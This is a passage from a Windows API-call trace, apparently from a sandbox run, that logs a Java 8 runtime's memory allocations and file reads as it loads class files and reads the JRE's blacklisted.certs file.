lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x129, lpOverlapped=0x0) returned 1 [0114.241] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.241] malloc (_Size=0x41) returned 0x12ed3fc0 [0114.241] free (_Block=0x12ef2d40) [0114.242] free (_Block=0x12ed3840) [0114.243] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3bcec, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=244972) returned 1 [0114.243] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.243] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3bd4a, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=245066) returned 1 [0114.243] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x136, lpOverlapped=0x0) returned 1 [0114.244] malloc (_Size=0x48) returned 0x12ed3840 [0114.244] malloc (_Size=0x39) returned 0x12ef2d40 [0114.245] free (_Block=0x12ed3fc0) [0114.245] free (_Block=0x12ef2cf0) [0114.247] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3be90, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=245392) returned 1 [0114.247] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.247] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3bee6, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=245478) returned 1 [0114.247] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x13e, lpOverlapped=0x0) returned 1 [0114.248] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.248] malloc (_Size=0x42) returned 0x12ed3fc0 [0114.248] free (_Block=0x12ef2d40) [0114.249] free (_Block=0x12ed3840) [0114.250] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c034, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=245812) returned 1 [0114.250] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.250] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c093, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=245907) returned 1 [0114.250] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x110, lpOverlapped=0x0) returned 1 [0114.269] malloc (_Size=0x48) returned 0x12ed3840 [0114.269] malloc (_Size=0x30) returned 0x12ef43d0 [0114.270] free (_Block=0x12ed3fc0) [0114.270] free (_Block=0x12ef2cf0) [0114.272] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c1b3, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=246195) returned 1 [0114.272] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.272] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c200, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=246272) returned 1 [0114.272] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xdb, lpOverlapped=0x0) returned 1 [0114.273] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.273] malloc (_Size=0x34) returned 0x12ef4410 [0114.274] free (_Block=0x12ef43d0) [0114.274] free (_Block=0x12ed3840) [0114.276] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c2eb, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=246507) returned 1 [0114.276] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.276] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c33c, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=246588) returned 1 [0114.276] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x5e3, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x5e3, lpOverlapped=0x0) returned 1 [0114.277] malloc (_Size=0x48) returned 0x12ed3840 [0114.277] malloc (_Size=0x43) returned 0x12ef2cf0 [0114.278] free (_Block=0x12ef4410) [0114.278] free (_Block=0x12ed3fc0) [0114.365] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c92f, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=248111) returned 1 [0114.365] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.365] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c98f, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=248207) returned 1 [0114.365] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x137, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x137, lpOverlapped=0x0) returned 1 [0114.367] malloc (_Size=0x48) returned 0x12ef2d40 [0114.367] malloc (_Size=0x2c) returned 0x12ef43d0 [0114.367] free (_Block=0x12ef2cf0) [0114.367] free (_Block=0x12ed3840) [0114.370] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3cad6, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=248534) returned 1 [0114.371] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.371] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3cb1f, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=248607) returned 1 [0114.371] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x7b6, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x7b6, lpOverlapped=0x0) returned 1 [0114.389] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.389] malloc (_Size=0x3d) returned 0x12ed3840 [0114.390] free (_Block=0x12ef43d0) [0114.390] free (_Block=0x12ef2d40) [0114.395] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d2e5, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=250597) returned 1 [0114.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.395] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d33f, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=250687) returned 1 [0114.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x128, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x128, lpOverlapped=0x0) returned 1 [0114.396] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.396] malloc (_Size=0x43) returned 0x12ef2d40 [0114.397] free (_Block=0x12ed3840) [0114.397] free (_Block=0x12ef2cf0) [0114.399] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d477, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=250999) returned 1 [0114.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.399] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d4d7, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=251095) returned 1 [0114.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x111, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x111, lpOverlapped=0x0) returned 1 [0114.401] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.401] malloc (_Size=0x31) returned 0x12ef43d0 [0114.402] free (_Block=0x12ef2d40) [0114.402] free (_Block=0x12ed3fc0) [0114.403] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d5f8, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=251384) returned 1 [0114.403] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.403] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3d646, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=251462) returned 1 [0114.403] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x448, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x448, lpOverlapped=0x0) returned 1 [0114.404] malloc (_Size=0x48) returned 0x12ef2d40 [0114.404] malloc (_Size=0x31) returned 0x12ef4410 [0114.405] free (_Block=0x12ef43d0) [0114.405] free (_Block=0x12ef2cf0) [0114.407] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3da9e, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=252574) returned 1 [0114.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.407] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3daec, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=252652) returned 1 [0114.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x478, lpOverlapped=0x0) returned 1 [0114.410] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.410] malloc (_Size=0x2f) returned 0x12ef43d0 [0114.411] free (_Block=0x12ef4410) [0114.411] free (_Block=0x12ef2d40) [0114.413] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3df74, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=253812) returned 1 [0114.413] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.413] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3dfc0, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=253888) returned 1 [0114.413] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x3cc, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x3cc, lpOverlapped=0x0) returned 1 [0114.414] malloc (_Size=0x48) returned 0x12ef2d40 [0114.414] malloc (_Size=0x2e) returned 0x12ef4410 [0114.414] free (_Block=0x12ef43d0) [0114.415] free (_Block=0x12ef2cf0) [0114.416] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e39c, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=254876) returned 1 [0114.416] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.416] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e3e7, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=254951) returned 1 [0114.416] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x30d, lpOverlapped=0x0) returned 1 [0114.417] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.417] malloc (_Size=0x41) returned 0x12ed3fc0 [0114.418] free (_Block=0x12ef4410) [0114.418] free (_Block=0x12ef2d40) [0114.421] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e704, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=255748) returned 1 [0114.421] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.421] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e762, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=255842) returned 1 [0114.421] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x10f, lpOverlapped=0x0) returned 1 [0114.422] malloc (_Size=0x48) returned 0x12ef2d40 [0114.422] malloc (_Size=0x3d) returned 0x1228ed20 [0114.423] free (_Block=0x12ed3fc0) [0114.423] free (_Block=0x12ef2cf0) [0114.425] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e881, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=256129) returned 1 [0114.426] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.426] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3e8db, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=256219) returned 1 [0114.426] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x148, lpOverlapped=0x0) returned 1 [0114.427] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.427] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.427] free (_Block=0x1228ed20) [0114.428] free (_Block=0x12ef2d40) [0114.429] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3ea33, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=256563) returned 1 [0114.429] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.429] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3ea98, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=256664) returned 1 [0114.429] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x116, lpOverlapped=0x0) returned 1 [0114.430] malloc (_Size=0x48) returned 0x12ef2d40 [0114.430] malloc (_Size=0x2e) returned 0x12ef43d0 [0114.431] free (_Block=0x12ef2cf0) [0114.431] free (_Block=0x12ed3fc0) [0114.433] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3ebbe, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=256958) returned 1 [0114.433] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.433] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3ec09, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=257033) returned 1 [0114.433] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x3d4, lpOverlapped=0x0) returned 1 [0114.434] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.434] malloc (_Size=0x2e) returned 0x12ef4410 [0114.434] free (_Block=0x12ef43d0) [0114.435] free (_Block=0x12ef2d40) [0114.436] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3efed, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=258029) returned 1 [0114.436] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.436] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f038, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=258104) returned 1 [0114.436] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x133, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x133, lpOverlapped=0x0) returned 1 [0114.437] malloc (_Size=0x48) returned 0x12ef2d40 [0114.437] malloc (_Size=0xc) returned 0x12db19f0 [0114.438] free (_Block=0x12ef4410) [0114.438] free (_Block=0x12ef2cf0) [0114.440] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f17b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=258427) returned 1 [0114.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.441] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f1a4, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=258468) returned 1 [0114.441] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x101, lpOverlapped=0x0) returned 1 [0114.450] malloc (_Size=0x48) returned 0x12ef2cf0 [0114.450] malloc (_Size=0x2000) returned 0x12e15f10 [0114.450] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f2b5, lpNewFilePointer=0x208ef10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef10*=258741) returned 1 [0114.450] ReadFile (in: hFile=0x2d0, lpBuffer=0x12e15f10, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208eee0, lpOverlapped=0x0 | out: lpBuffer=0x12e15f10*, lpNumberOfBytesRead=0x208eee0*=0x2000, lpOverlapped=0x0) returned 1 [0114.451] free (_Block=0x12db6970) [0114.451] malloc (_Size=0x15) returned 0x12db1e70 [0114.451] free (_Block=0x12db19f0) [0114.452] free (_Block=0x12ef2d40) [0114.458] strlen (_Str="sun/security/provider/certpath/UntrustedChecker.class") returned 0x35 [0114.458] malloc (_Size=0x48) returned 0x12ef2d40 [0114.458] malloc (_Size=0xa0) returned 0x12dabe10 [0114.458] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33debf7, lpNewFilePointer=0x208e060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e060*=54389751) returned 1 [0114.458] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e030, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208e030*=0xa0, lpOverlapped=0x0) returned 1 [0114.458] malloc (_Size=0x36) returned 0x12ef43d0 [0114.488] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\blacklisted.certs") returned 0x41 [0114.488] malloc (_Size=0x8e) returned 0x12ed4580 [0114.488] wcscpy (in: _Dest=0x12ed4580, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\blacklisted.certs" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\blacklisted.certs") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\blacklisted.certs" [0114.488] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0114.489] free (_Block=0x12ed4580) [0114.491] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b700, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b6d0, lpOverlapped=0x0 | out: lpBuffer=0x208b700*, lpNumberOfBytesRead=0x208b6d0*=0x4e5, lpOverlapped=0x0) returned 1 [0114.500] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b700, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b6d0, lpOverlapped=0x0 | out: lpBuffer=0x208b700*, lpNumberOfBytesRead=0x208b6d0*=0x0, lpOverlapped=0x0) returned 1 [0114.501] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b700, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b6d0, lpOverlapped=0x0 | out: lpBuffer=0x208b700*, lpNumberOfBytesRead=0x208b6d0*=0x0, lpOverlapped=0x0) returned 1 [0114.505] CloseHandle (hObject=0x2d4) returned 1 [0114.507] strlen (_Str="java/lang/invoke/LambdaMetafactory.class") returned 0x28 [0114.507] malloc (_Size=0x48) returned 0x1228ed20 [0114.507] malloc (_Size=0xa0) returned 0x12dab7e0 [0114.507] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415f28, lpNewFilePointer=0x208db50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db50*=54615848) returned 1 [0114.507] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db20, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208db20*=0xa0, lpOverlapped=0x0) returned 1 [0114.509] malloc (_Size=0x29) returned 0x12ef4410 [0114.534] strlen (_Str="java/lang/invoke/MethodType$ConcurrentWeakInternSet.class") returned 0x39 [0114.534] malloc (_Size=0x48) returned 0x1228ed20 [0114.534] malloc (_Size=0xa0) returned 0x12dabb50 [0114.535] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415e68, lpNewFilePointer=0x208ca60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca60*=54615656) returned 1 [0114.535] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca30, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208ca30*=0xa0, lpOverlapped=0x0) returned 1 [0114.535] malloc (_Size=0x3a) returned 0x12ed3fc0 [0114.537] strlen (_Str="java/lang/invoke/MethodTypeForm.class") returned 0x25 [0114.538] malloc (_Size=0x48) returned 0x12ef2d40 [0114.538] malloc (_Size=0xa0) returned 0x12dac230 [0114.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415e15, lpNewFilePointer=0x208ceb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ceb0*=54615573) returned 1 [0114.538] ReadFile (in: hFile=0x134, lpBuffer=0x12dac230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce80, lpOverlapped=0x0 | out: lpBuffer=0x12dac230*, lpNumberOfBytesRead=0x208ce80*=0xa0, lpOverlapped=0x0) returned 1 [0114.538] malloc (_Size=0x26) returned 0x12ef1470 [0114.547] strlen (_Str="java/lang/invoke/MethodType$ConcurrentWeakInternSet$WeakEntry.class") returned 0x43 [0114.547] malloc (_Size=0x48) returned 0x12ef2d40 [0114.547] malloc (_Size=0xa0) returned 0x12dab9f0 [0114.547] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415d57, lpNewFilePointer=0x208d2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2d0*=54615383) returned 1 [0114.547] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2a0, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208d2a0*=0xa0, lpOverlapped=0x0) returned 1 [0114.547] malloc (_Size=0x44) returned 0x1228ed20 [0114.580] strlen (_Str="java/lang/invoke/MethodHandles.class") returned 0x24 [0114.580] malloc (_Size=0x48) 